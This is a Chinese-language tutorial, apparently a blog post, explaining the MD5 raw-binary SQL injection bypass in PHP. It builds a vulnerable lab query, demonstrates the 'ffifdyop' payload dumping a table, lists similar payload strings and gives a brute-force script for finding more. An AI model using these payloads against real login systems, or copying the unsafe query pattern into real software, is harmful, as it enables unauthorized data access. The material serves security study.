文章目录
- 参考
- 环境
- 推荐阅读
- 雾现
- 两个 PHP 文件
- 表结构
- 分析
- 雾散
- ASCII 编码
- 二进制数据到 ASCII 文本的转化
- 绕过原理
- ffifdyop
- 绕过
- ffifdyop 的批量化生产
- 批量化生产
- 注意事项
- 细节
- 一字之差
- 运算符优先级
- 实际需要遵守的规则
- 生产机器
参考
| 项目 | 描述 |
|---|---|
| 搜索引擎 | Bing、Google |
| AI 大模型 | 文心一言、通义千问、讯飞星火认知大模型、ChatGPT |
| PHP 手册 | PHP Manual |
| MySQL Documentation | https://dev.mysql.com/doc/ |
| 菜鸟教程 | MySQL 教程 |
| C 语言中文网 | PHP正则表达式,看这一篇就够了 |
环境
| 项目 | 描述 |
|---|---|
| PHP | 8.0.0 |
| SQL Version | 8.0.33 MySQL Community Server - GPL |
推荐阅读
| 项目 | 描述 |
|---|---|
| CSDN | MD5 绕过第一式:弱比较绕过 |
| CSDN | MD5 绕过第二式:数组绕过 |
雾现
两个 PHP 文件
db_info.php
<?php// 定义与数据库相关的常量
# 提供运行 MySQL 服务的服务器地址
const HOSTNAME = 'localhost';
# 登录 MySQl 服务器使用的用户名
const USERNAME = 'root';
# 登录用户 root 的密码
const PASSWORD = '123456';
# 连接 MySQL 后需要使用到的数据库
const DATABASE = 'db_test';
search.php
<?php# 包含文件以获取登录服务器所需要使用到的常量
include_once('./db_info.php');# 模拟用户输入
$user_input = 'User Input';# 尝试连接数据库,若连接失败则立即终止程序
$db = mysqli_connect(HOSTNAME, USERNAME, PASSWORD, DATABASE) or die();# 构造 SQL 查询语句
$qs = "SELECT * FROM data WHERE username = 'admin' and password ='" . md5($user_input, true) . "';";
# 向 MySQL 发起查询操作
$result = mysqli_query($db, $qs);# 向 MySQL 获取查询结果
while ($content = mysqli_fetch_assoc($result)) {var_dump($content);
}
上述 PHP 代码分别是 db_info.php 与 search.php 文件中的内容。其中,db_info.php 文件保存了通过 PHP 插件 mysqli 连接 MySQL 所需要的信息。而 test.php 则尝试连接 MySQL,并在连接后向 MySQL 发起查询以获取所需要的数据。
表结构
在本示例中,我们使用到的数据库是 db_test,使用到的表是 data。
在终端中使用如下语句以获取表 data 的创建信息:
SHOW CREATE TABLE data\G
得到如下内容:
*************************** 1. row ***************************Table: data
Create Table: CREATE TABLE `data` (`username` varchar(25) DEFAULT NULL,`password` varbinary(16) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci
1 row in set (0.00 sec)
由输出可知,data 中包含两个字段,分别为 username 与 password。username 使用 varchar(25) 作为其数据类型,这意味着 username 字段至多可以接受 25 个 字符 作为该字段的值。而 password 使用 binary(16) 作为其数据类型,着意味着 password 字段至多可以接收 16 字节的 二进制数据 作为该字段的值。
尝试查询 data 表中的所有数据
在终端中执行如下语句:
SELECT * FROM data;
得到如下结果:
+----------+------------------------------------+
| username | password |
+----------+------------------------------------+
| admin | 0x1E6947AC7FB3A9529A9726EB692C8CC5 |
| RedHeart | 0xDC04139732D12110E885BA1C703B3C42 |
+----------+------------------------------------+
2 rows in set (0.00 sec)
分析
在 search.php 文件中,我们的重点是如下代码片段。
# 构造 SQL 查询语句
$qs = "SELECT * FROM data WHERE username = 'admin' and password ='" . md5($user_input, true) . "';";
# 向 MySQL 发起查询操作
$result = mysqli_query($db, $qs);
search.php 尝试向 MySQL 发起查询,向 data 表中查询 username 字段为 admin 以及 password 为 md5($user_input, true) 函数的二进制加密结果的行记录。其中,$user_input 变量用于模拟用户的输入。我们的目标便是 通过构造合适的用户输入,使得查询操作能够获取到 data 表中的所有内容。
注:
在现代科技的攻势下,MD5 的哈希结果已经能够在 数小时内找到能够产生哈希碰撞的另一原始数据值🧙🏻♂️,所以请使用安全系数更高的哈希函数来加密密码吧。
雾散
ASCII 编码
ASCII(American Standard Code for Information Interchange) 是一种字符编码标准,用于 将文本字符映射到数值。ASCII 最早🤞在计算机领域中广泛使用,它定义了 128 个不同的字符,包括 控制字符(如换行和回车) 以及 可打印字符(如字母、数字、标点符号等)。ASCII 定义的每个字符都被分配了一个 唯一的整数值,范围从 0 到 127。
注:
世界上存在许多的编码方案,但这些方案大多是 基于 ASCII 编码进行扩展的🌹,因此 ASCII 编码也被认为是 字符编码的基础。
二进制数据到 ASCII 文本的转化
PHP 中的 md5() 函数在第二个参数为 true 时会将 MD5 哈希结果以二进制数据 的形式进行返回,因 MD5 函数的返回值类型为 字符串,故在返回结果前,二进制数据将使用 ASCII 进行 解码(二进制数据到文本字符的转化)。对此,请参考如下示例:
<?phpvar_dump(md5('Hello World', true));
执行效果
其中:
- 由四边形包裹的问号
一个字节能够表示的十进制数的范围为0~255,而 ASCII 中的字符的编号范围为0~127,两者的范围不对等。因此,当一个字节所表示的十进制数在128~255时,该字节将使用四边形包裹的问号(不同的环境可能有不同的表现方式)表示。 - ASCII 字符
字节的十进制数表示在0~127时,均使用 ASCII 中相应的字符进行表示。 - 小而多(容量大,包含几个字符)的方块字
ASCII 字符中存在一部分控制字符,这些字符起着控制作用,由于没有这些字符的具体表现形式,所以使用表示这些控制字符的英文缩写的方块字来展现这些字符。 - 在上述内容中存在一个换行,这是由于某个字节转化为 ASCII 字符后得到了
可打印字符——换行符所产生的效果。
绕过原理
二进制数据会被转化为 ASCII 字符✨,如果某一个字符串在经过 MD5 哈希后,得到的二进制数据转化为 ASCII 文本后恰能够与周围的文本形成 SQL 注入语句,那么我们就能够绕过限制,成功发起攻击😈。
ffifdyop
在此类绕过实践中,ffifdyop 就是一个得力的工具。对此,请参考如下示例:
<?phpvar_dump(md5('ffifdyop', true));
执行效果
string(16) "'or'6�]��!r,��b"
ffifdyop 经过两次转化后得到的结果是 'or'6�]��!r,��b。位于 or 两侧的单引号可以用于闭合两端的单引号,使得 or 不再被 MySQL 认为是字符串,而是一个关键字,发挥着 逻辑或运算符 的作用。
绕过
尝试将 search.php 文件中的 $user_input 赋值为 ffifdyop。
<?php# 包含文件以获取登录服务器所需要使用到的常量
include_once('./db_info.php');# 模拟用户输入
$user_input = 'ffifdyop';# 尝试连接数据库,若连接失败则立即终止程序
$db = mysqli_connect(HOSTNAME, USERNAME, PASSWORD, DATABASE) or die();# 构造 SQL 查询语句
$qs = "SELECT * FROM data WHERE username = 'admin' and password ='" . md5($user_input, true) . "';";
# 输出构造结果,便于分析
var_dump($qs);
# 向 MySQL 发起查询操作
$result = mysqli_query($db, $qs);# 向 MySQL 获取查询结果
while ($content = mysqli_fetch_assoc($result)) {var_dump($content);
}
执行效果
由于 WHERE 关键字后的条件语句 username = '' and password =''or'6�]��!r,��b' 对于表中的每一个字段都为 true,因此我们成功的实现了 SQL 注入,获得了 data 表中的所有数据。
string(77) "SELECT * FROM data WHERE username = 'admin' and password =''or'6�]��!r,��b';"
array(2) {["username"]=>string(5) "admin"["password"]=>string(16) "iG���R��&�i,��"
}
array(2) {["username"]=>string(8) "RedHeart"["password"]=>string(16) "��2�!腺p;<B"
}
ffifdyop 的批量化生产
批量化生产
除了 ffifdyop 外,还存在许多类似的文本。对此,请参考如下示例:
<?phpvar_dump(md5(`16529176061`, true));
var_dump(md5(5207660362, true));
var_dump(md5('ffifdyop', true));
执行效果
string(16) "'OR'1q1uMp$��7"
string(16) "@;-V'or'2�9D��"
string(16) "'or'6�]��!r,��b"
要获得更多像 ffifdyop 这样的文本仅需要编写适当的程序。这个程序需要 产生许多文本并在随后对这些文本进行 MD5 哈希及 ASCII 的转化,最后设计从中挑选符合某一规则的文本 即可。至于需要符合的某一规则,可以是包含 ' or ' 的文本👹。
注意事项
细节
一字之差
在继续讲解前,请先观察如下两条 SQL 语句及其查询结果:
mysql> SELECT * FROM data WHERE username = 'admin' and password = 'Random' or '1Hello';
+----------+------------------------------------+
| username | password |
+----------+------------------------------------+
| admin | 0x1E6947AC7FB3A9529A9726EB692C8CC5 |
| RedHeart | 0xDC04139732D12110E885BA1C703B3C42 |
+----------+------------------------------------+
2 rows in set, 1 warning (0.00 sec)mysql> SELECT * FROM data WHERE username = 'admin' and password = 'Random' or 'Hello';
Empty set, 1 warning (0.00 sec)
两条 SQL 查询语句 仅仅存在一字之差。使用 '1Hello' 却成功实现了 SQL注入,而使用 'Hello' 却什么也没有获得。
运算符优先级
在 MySQL 中,运算符之间是存在优先级的。在进行运算过程中,运算符优先级更高的运算优先进行。在同时存在 =、and 及 or 的运算中,MySQL 将优先处理 =,其次 and,最后 or。
username = 'admin' and password = 'Random' or 'Hello'
在上述运算中,username = 'admin' 与 password = 'Random' 将被优先运算,但由于字段与相应字段值均不相符,故两者的运算结果均为 false。false and false 的结果也是 false。最后,false or 'Hello' 该如何进行?
在 false or 'Hello' 中,'Hello' 将被转化为布尔值。依据 MySQL 相关的转化规则,以 非零数值开头的字符串 都将被转化为 true,其他字符串则被转化为 false。于是一字之差决定了成败🧐。
实际需要遵守的规则
因此在 ffifdyop 的批量化生产中,挑选的规则不是只是包含 ' or ' 的文本,而应该是:
包含 ' or ' 的文本,且 第二个引号的右侧的第一个字符需要是数字字符(0 ~ 9)。
生产机器
依据 类 ffifdyop 文本 的挑选规则,我们编写了如下 PHP 脚本:
<?phpconst MAX_EDGE = 9999999999;for ($i=0; $i<MAX_EDGE; $i++) {if (preg_match("/'\s*or\s*'\d+/i", md5($i, true))) {print("\n" . $i . "\n");} else {# pass}
}
在上述文本中,我们尝试通过使用循环变量 $i 作为可能的 ffifdyop 文本。在每一轮循环中,我们都将通过 preg_match() 提供的 正则表达式 来判断 $i 的 MD5 哈希结果值的 ASCII 形式 中是否符合 规定的文本模式,若符合则将其输出至终端中。
